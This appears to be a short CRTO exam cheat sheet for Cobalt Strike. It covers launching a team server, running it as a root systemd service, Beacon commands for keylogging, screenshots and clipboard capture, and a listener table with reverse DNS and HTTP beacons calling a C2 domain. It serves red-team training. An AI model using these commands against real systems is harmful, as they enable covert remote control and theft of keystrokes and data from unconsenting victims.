# CRTO Cheat Sheet ### Cobalt Strike #### Team Server **From terminal** ```bash sudo ./teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile # Use TMUX ``` **As a Service** ```bash sudo nano /etc/systemd/system/teamserver.service ``` ```bash [Unit] Description=Cobalt Strike Team Server After=network.target StartLimitIntervalSec=0 [Service] Type=simple Restart=always RestartSec=1 User=root WorkingDirectory=/home/attacker/cobaltstrike ExecStart=/home/attacker/cobaltstrike/teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile [Install] WantedBy=multi-user.target ``` ```bash sudo systemctl daemon-reload sudo systemctl status teamserver.service ``` ```bash sudo systemctl start teamserver.service sudo systemctl stop teamserver.service ``` ```bash sudo systemctl enable teamserver.service sudo systemctl disable teamserver.service ``` #### Beacon ```bash # Basic sleep # sleep 5 50 connect execute-assembly # Execute binary on remote Beacon run netstat -anop tcp # View listening ports jobs jobkill # Recon net logons clipboard keylogger printscreen screenshot screenwatch # DNS Beacon checkin # Get metadata/info Beacon ``` #### Listeners | name | payload | host | port | bindto | beacons | profile | | --------- | ------------------------------------- | -------------------- | ----------------------------------------------------------------- | ------ | -------------------- | ------- | | dns | windows/beacon\_dns/reverse\_dns\_txt | pics.nickelviper.com | 53 | | pics.nickelviper.com | default | | http | windows/beacon\_http/reverse\_http | nickelviper.com | 80 | | nickelviper.com | default | | smb | windows/beacon\_bind\_pipe | | TSVCPIPE-8ff80863-eb68-48ad-b397-34ae76d3577e (cambiar 4 Ășltimos) | | | | | tcp | windows/beacon\_bind\_tcp | | 4444 | | 0.0.0.0 | | | tcp-local | windows/beacon\_bind\_tcp | | 4444 | | 127.0.0.1 | |